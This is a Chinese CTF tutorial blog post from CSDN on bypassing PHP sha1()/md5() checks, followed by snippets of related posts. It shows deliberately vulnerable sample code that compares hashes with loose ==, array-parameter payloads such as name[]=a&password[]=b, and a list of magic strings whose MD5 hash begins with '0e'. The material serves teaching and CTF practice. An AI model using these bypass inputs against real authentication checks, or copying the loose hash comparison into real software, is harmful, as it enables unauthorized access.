php的md5函数漏洞,sha1和md5函数漏洞

最新推荐文章于 2023-05-28 23:18:11 发布
最新推荐文章于 2023-05-28 23:18:11 发布
阅读量716 收藏 3
点赞数 1
文章标签: php的md5函数漏洞
本文介绍了在CTF比赛中如何利用SHA1和MD5函数的漏洞进行绕过。当要求SHA1(name)等于SHA1(password)时,通过构造数组参数可以导致函数处理异常,从而获取flag。同样,对于MD5函数,当其结果以0e开头且后续为数字时,会被解释为科学计数法的0,这也能用于绕过条件判断。文章提供了具体的例子和解题方法,展示了如何利用这种特性在特定的代码场景中获取flag。
摘要由CSDN通过智能技术生成

sha1函数和md5函数比较绕过

在CTF比赛中经常遇到利用sha1()和md5()函数漏洞的题,先看一段代码:

1

2

3

4

5

6

7

8

9

10

11

12<?php

require 'flag.php';

if (isset($_GET['name']) and isset($_GET['password'])) {

if ($_GET['name'] == $_GET['password'])

print 'Your password can not be your name.';

else if (sha1($_GET['name']) == sha1($_GET['password']))

die('Flag: '.$flag);

else

print '

Invalid password.

';

}

?>

GET了两个参数name和password,获得flag要求的条件是:name != password & sha1(name) == sha1(password)

此时就可以利用sha1()函数的漏洞来绕过。如果把这两个字段构造为数组,如:

name[]=a&password[]=b

这样在第一处判断时两数组确实是不同的,但在第二处判断时由于sha1()函数无法处理数组类型,将报错并返回NULL,if 条件成立,获得flag。

经验证md5()函数同样存在此漏洞。

md5加密相等绕过

题目代码:

1

2

3

4

5

6

7

8

9

10

11

12<?php

$md51 = md5('QNKCDZO');

$a = @$_GET['a'];

$md52 = @md5($a);

if(isset($a)){

if ($a != 'QNKCDZO' && $md51 == $md52) {

echo "flag{*}";

} else {

echo "false!!!";

}}

else{echo "please input a";}

?>

输入的参数不等于QNKCDZO,但是md5('QNKCDZO')==md5($a)

md5(‘QNKCDZO ‘)=0e830400451993494058024219903391

而0e 开头且后面都是数字会被当作科学计数法,也就是等于 0*10^xxx=0

如果md5 是以 0e 开头,在做比较的时候,便可以用这种方法绕过

1

2

3

4

5

6md5(s878926199a)=0e545993274517709034328855841020

md5(s155964671a)=0e342768416822451524974117254469

md5(s214587387a)=0e848240448830537924465865611904

md5(s1091221200a)=0e940624217856561557816327384675

md5(s1885207154a)=0e509367213418206700842008763514

md5(s1502113478a)=0e861580163291561247404381396064

以上这些都可以使用

解题方法:

GET请求:?a=s878926199a 即可获得flag

weixin_39805539
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP 函数漏洞总结
wuyouxiaoli的博客
02-17 295
1.MD5 compare漏洞 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 常见的payload有 0x01md5(str) QNKCDZO 240610708 s878926199a s155964671a s214587387a s214587387asha1(st...
PHP sha1() md5()函数漏洞
热门推荐
03-09 1万+
1.Prudential   I don‘t think that sha1 is broken. Prove me wrong. 代码如下: [php] view plaincopyprint?           level1       'stylesheet' href='style.css' type='text/
php漏洞 sha1函数
YenKoc的博客
12-01 505
0x01: 绕过技巧是传入的是数组时,会报错,返回为NULL,当传入的两个参数都是数组直接相等
php sha1漏洞,PHP sha1()函数
weixin_39673303的博客
03-11 198
$str = "dashu";echo sha1($str);?>定义和用法sha1() 函数计算字符串的 SHA-1 散列。sha1() 函数使用美国 Secure Hash 算法 1。提示:如需计算文件的 SHA-1 散列,请使用 sha1_file() 函数sha1(string,raw)规定十六进制或二进制输出格式:TRUE - 原始 20 字符二进制格式FALSE - 默认。40...
PHP 中的sha1()和MD5()函数漏洞
Cray
10-25 7487
---------------sha1--------------- 例如这个代码:$_GET[‘name‘] != $_GET[‘password‘]  &&  sha1($_GET[‘name‘]) === sha1($_GET[‘password‘]) 可通过构造     ?name[]&paaword[]=123123来绕过 ---------------MD5---------
利用PHP脚本在Linux下用md5函数加密字符串的方法
10-24
然而,对于加密而言,md5sum并不是一个安全的选择,和PHP中的md5函数一样,它更适用于校验而不是安全加密。 在Linux环境下,你可以直接使用md5sum命令来加密字符串。这可以通过echo命令和管道技术实现。例如,你...
php常用hash加密函数
10-25
例如,MD5SHA1是较为老旧的哈希函数,它们因安全性问题已逐渐被淘汰,但在一些需要向后兼容的场景中仍然可以看到它们的身影。RIPEMD-160是一种相对安全的哈希算法,它生成的哈希值长度为160位,尽管如此,对于安全...
PHP特性(网友整理1)1
08-03
1.2.1 `md5()`与`sha1()`函数 这两个函数用于计算字符串的哈希值,但它们不能处理数组,直接应用到数组上会返回 `false`。然而,由于弱类型比较,`false` 可能会被误认为是有效的哈希值,从而可能在哈希验证中造成...
PHP特性(网友根据ctfshow整理)1
08-03
10. **`sha1()`和`md5()`**: 这两个函数分别用于计算SHA1MD5散列,常用于密码存储和数据校验。不过,由于它们的安全性较低,现代应用通常倾向于使用更安全的哈希算法。 11. **变量覆盖与`die()`**: `die()`...
基于PHP的5556网址压缩php版源码.zip
最新发布
07-23
2. **哈希算法**:可能使用了哈希函数MD5SHA-1来创建短链接的唯一标识,保证URL的唯一性。 3. **数据库操作**:存储和检索压缩过的URL,可能涉及MySQL或其他数据库,需要掌握SQL查询和事务处理。 4. **路由和...
md5 php 漏洞,【实验吧web】FALSE,PHP sha1() md5()函数漏洞
weixin_29250403的博客
03-10 166
标签:原题目链接:http://www.shiyanbar.com/ctf/1787参考答案链接:http://blog.csdn.net/zhaohansk/article/details/44153141题目PHP代码审计hint:sha1函数你有认真了解过吗?听说也有人用md5碰撞o(╯□╰)o格式:CTF{}解题链接: http://ctf4.shiyanbar.com/web/false...
MD5&sha1绕过
Luodehahajiang的博客
02-07 2799
md5绕过 sha1绕过 fastcoll
phpsha1,PHPsha1()函数md5()函数的绕过
weixin_39997664的博客
03-28 1097
相信大家都知道,sha1函数md5都是哈希编码的一种,在PHP中,这两种编码是存在绕过漏洞的。PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。因此我们只需要传入开头都是0E的两个值,便可成功绕过。例如这个代码(sha1($_GET...
反序列化-md5sha1绕过
2202_75361164的博客
05-28 659
第一组: x=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB。这里本来打算用数组绕过sha1,但是(string)强制转化数组只会得到一个值即:array,所以数组绕过不了:(string)$$md5==md5($md5) 需要一个md5md5(md5) 都是0e开头。
PHPsha1()函数md5()函数的绕过
weixin_46578840的博客
08-10 1700
PHPsha1()函数md5()函数的绕过 sha1函数md5都是哈希编码的一种,在PHP中,这两种编码是存在绕过漏洞的。 PHP在处理哈希字符串时,会利用”!=”或”==”来对哈希值进行比较,它把每一个以”0E”开头的哈希值都解释为0,所以如果两个不同的密码经过哈希以后,其哈希值都是以”0E”开头的,那么PHP将会认为他们相同,都是0。 只需要传入开头都是0E的两个值,便可成功绕过。 例如这个代码(sha1($_GET['uname']) === sha1($_POST['passwd'])
php md5sha1,PHP md5(),sha1() 函数
weixin_29924309的博客
03-25 218
PHP md5(),sha1() 函数定义和用法md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘译算法。如果成功,则返回所计算的 MD5 散列,如果失败,则返回 false。语法md5(string,raw)参数 描述string 必需。规定要计算的字符串。charlist 可选。规定十六进制或二进制输出格式:TRUE - 原始 16 字符二...
php函数的常见漏洞
sun的博客
09-30 1801
php中得strcmp()函数漏洞: strcmp(a1,a2)函数用来比较两个字符串是否相等的,比较的是对应字符的ascii码,如果相等返回0,当a1的ascii大于a2的返回小于0,a1的ascii码小于a2的,返回大于0. 但是这个函数是存在漏洞的,我们知道这个函数是用来比较字符串的,但是当我们传入为数组是,那变成字符串和数组进行比较了,因此php在5.2之前,默认返回的-1,5.2版...
PHPMD5sha1绕过
cosmoslin的博客
10-26 7685
1 数组绕过 对于php强比较和弱比较:md5(),sha1()函数无法处理数组,如果传入的为数组,会返回NULL,所以两个数组经过加密后得到的都是NULL,也就是相等的。 <?php $a=$_GET['a']; $b=$_GET['b']; if ($a!==$b && md5($a)===md5($b)){ return "hahaha"; } 使用: ?a[]=1&b[]=2 2 0e绕过弱比较 对于某些特殊的字符串加密后得到的密文以0e开头,PHP会当作科
单向哈希函数MD5SHA家族
"该文件详细介绍了Hash算法,特别是SHA-256和MD5这两种常见的哈希函数。文件内容涵盖了单向哈希函数的概念、性质、以及它们在信息安全中的应用,如消息认证和密码验证。" 哈希算法是信息安全领域中的核心工具之一,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值